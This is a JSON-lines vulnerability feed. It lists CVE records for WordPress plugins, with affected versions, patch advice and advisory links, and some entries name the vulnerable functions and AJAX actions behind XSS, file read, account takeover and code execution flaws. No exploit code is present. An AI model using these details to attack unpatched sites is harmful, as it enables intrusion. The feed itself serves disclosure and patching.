{"CVE_ID":"CVE-2025-6720","slug":"mrkv-vchasno-kasa","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_all_log() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to clear log files.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd03483a-f46c-4e17-8b58-df87b0ad7fa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd03483a-f46c-4e17-8b58-df87b0ad7fa3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13664","slug":"wp-post-list-table","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The WP Post List Table plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpb_post_list_table' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227735\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227735\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b18f6817-86db-4a72-a2e9-a9e047e05bc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b18f6817-86db-4a72-a2e9-a9e047e05bc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3664","slug":"fileorganizer","versionEndExcluding":"1.0.4","description":"The FileOrganizer WordPress plugin through 1.0.2 does not restrict functionality on multisite instances, allowing site admins to gain full control over the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d59e6eac-3ebf-40e0-800c-8cbef345423f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d59e6eac-3ebf-40e0-800c-8cbef345423f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13576","slug":"gumlet-video","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Gumlet Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gumlet' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gumlet-video\\\/tags\\\/1.0.3\\\/gumlet-video.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gumlet-video\\\/tags\\\/1.0.3\\\/gumlet-video.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b8b94fc-9ae7-47f3-b804-92d0948b662e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b8b94fc-9ae7-47f3-b804-92d0948b662e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1086","slug":"preview-link-generator","versionEndExcluding":"1.0.4","description":"The Preview Link Generator WordPress plugin before 1.0.4 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2bda716-76dc-4a26-b26a-7a2a764757b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2bda716-76dc-4a26-b26a-7a2a764757b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32592","slug":"posts-table-filterable","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Stored XSS. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.3.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11770","slug":"post-types-carousel-slider","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Post Carousel & Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-cs' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-types-carousel-slider\\\/trunk\\\/includes\\\/ajax.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-types-carousel-slider\\\/trunk\\\/includes\\\/ajax.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-types-carousel-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-types-carousel-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0604","slug":"wp-food-manager","versionEndExcluding":"1.0.4","description":"The WP Food Manager WordPress plugin before 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4492b5ad-c339-47f5-9003-a9c5f23efdd9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4492b5ad-c339-47f5-9003-a9c5f23efdd9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0509","slug":"wp-404-auto-redirect-to-similar-post","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018request\u2019 parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031134\\\/wp-404-auto-redirect-to-similar-post\\\/trunk\\\/includes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031134\\\/wp-404-auto-redirect-to-similar-post\\\/trunk\\\/includes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12849","slug":"error-log-viewer-wp","versionImpact":"1.0.1.3","versionEndExcluding":"1.0.4","description":"The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L295\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L295\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L479\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/error-log-viewer-wp\\\/tags\\\/1.0.1.3\\\/error-log-viewer-wp.php#L479\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215563%40error-log-viewer-wp&new=3215563%40error-log-viewer-wp&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215563%40error-log-viewer-wp&new=3215563%40error-log-viewer-wp&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13398","slug":"checkout-for-paypal","versionImpact":"1.0.32","versionEndExcluding":"1.0.33","description":"The Checkout for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'checkout_for_paypal' shortcode in all versions up to, and including, 1.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223256%40checkout-for-paypal&new=3223256%40checkout-for-paypal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223256%40checkout-for-paypal&new=3223256%40checkout-for-paypal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e552b8-84ad-436d-b029-f7dd4534f7d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e552b8-84ad-436d-b029-f7dd4534f7d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11295","slug":"simple-page-access-restriction","versionImpact":"1.0.29","versionEndExcluding":"1.0.30","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","recommendation":"Update to version 1.0.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205648\\\/simple-page-access-restriction\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205648\\\/simple-page-access-restriction\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3811","slug":"wpbookit","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The WPBookit plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.2. This is due to the plugin not properly validating a user's identity prior to updating their details like email through the edit_newdata_customer_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61cce43-0df7-4ca9-8897-24c7d131b505?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a61cce43-0df7-4ca9-8897-24c7d131b505?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3810","slug":"wpbookit","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The WPBookit plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.2. This is due to the plugin not properly validating a user's identity prior to updating their details like password and email through the edit_profile_data() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses and passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278939\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54f1ebfb-67f1-461d-91f1-269b0a2c0653?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54f1ebfb-67f1-461d-91f1-269b0a2c0653?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5943","slug":"advanced-quiz","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The Wp-Adv-Quiz WordPress plugin before 1.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18fbe9d5-4829-450b-988c-8ba4becd032a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18fbe9d5-4829-450b-988c-8ba4becd032a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2600","slug":"custom-base-terms","versionEndExcluding":"1.0.3","description":"The Custom Base Terms WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1d65c3-14e4-482f-ae9e-323e847a8613\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1d65c3-14e4-482f-ae9e-323e847a8613\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2546","slug":"wp-user-switch","versionEndExcluding":"1.0.3","description":"The WP User Switch plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.2. This is due to incorrect authentication checking in the 'wpus_allow_user_to_admin_bar_menu' function with the 'wpus_who_switch' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89d912d-fa7a-4fb1-8872-95fa861c21ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89d912d-fa7a-4fb1-8872-95fa861c21ca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2921182\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2921182\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php?rev=2237142#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-switch\\\/trunk\\\/inc\\\/functions.php?rev=2237142#L33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5392","slug":"gb-forms-db","versionImpact":"1.0.2","versionEndExcluding":"1.0.3","description":"The GB Forms DB plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.2 via the gbfdb_talk_to_front() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leverage to inject backdoors or create new administrative user accounts to name a few things.","recommendation":"Update to version 1.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L367\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gb-forms-db\\\/trunk\\\/core\\\/functions.php#L367\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323703%40gb-forms-db&new=3323703%40gb-forms-db&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323703%40gb-forms-db&new=3323703%40gb-forms-db&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe8723a7-bbb1-41a0-b222-3cf4eb44cd64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe8723a7-bbb1-41a0-b222-3cf4eb44cd64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6220","slug":"piotnetforms","versionImpact":"1.0.28","versionEndExcluding":"1.0.29","description":"The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'piotnetforms_ajax_form_builder' function in versions up to, and including, 1.0.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af2b7eac-a3f5-408f-b139-643e70b3f27a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af2b7eac-a3f5-408f-b139-643e70b3f27a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnetforms\\\/tags\\\/1.0.26\\\/inc\\\/forms\\\/ajax-form-builder.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnetforms\\\/tags\\\/1.0.26\\\/inc\\\/forms\\\/ajax-form-builder.php#L430\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11275","slug":"timetics","versionImpact":"1.0.27","versionEndExcluding":"1.0.28","description":"The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the \/wp-json\/timetics\/v1\/customers\/ REST API endpoint in all versions up to, and including, 1.0.27. This makes it possible for authenticated attackers, with Timetics Customer access and above, to delete arbitrary users.","recommendation":"Update to version 1.0.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php#L308\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php#L308\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206505%40timetics&new=3206505%40timetics&sfp_email=&sfph_mail=#file199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206505%40timetics&new=3206505%40timetics&sfp_email=&sfph_mail=#file199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5038","slug":"colibri-page-builder","versionImpact":"1.0.276","versionEndExcluding":"1.0.277","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.276 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.277, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08159865-1411-4a07-b5db-f4ba5bf2d633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08159865-1411-4a07-b5db-f4ba5bf2d633?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/blog\\\/post-item.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/blog\\\/post-item.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4451","slug":"colibri-page-builder","versionImpact":"1.0.276","versionEndExcluding":"1.0.277","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's colibri_video_player shortcode in all versions up to, and including, 1.0.276 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.277, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0afd981e-3ae8-4450-9750-23ff6fe612dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0afd981e-3ae8-4450-9750-23ff6fe612dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/video.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3340","slug":"colibri-page-builder","versionImpact":"1.0.272","versionEndExcluding":"1.0.274","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri-gallery-slideshow' shortcode in all versions up to, and including, 1.0.272 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.274, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ba832e-98bc-421d-9b60-e6260c408815?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ba832e-98bc-421d-9b60-e6260c408815?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3337","slug":"colibri-page-builder","versionImpact":"1.0.272","versionEndExcluding":"1.0.274","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri_breadcrumb_element' shortcode in all versions up to, and including, 1.0.272 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.274, or a newer patched 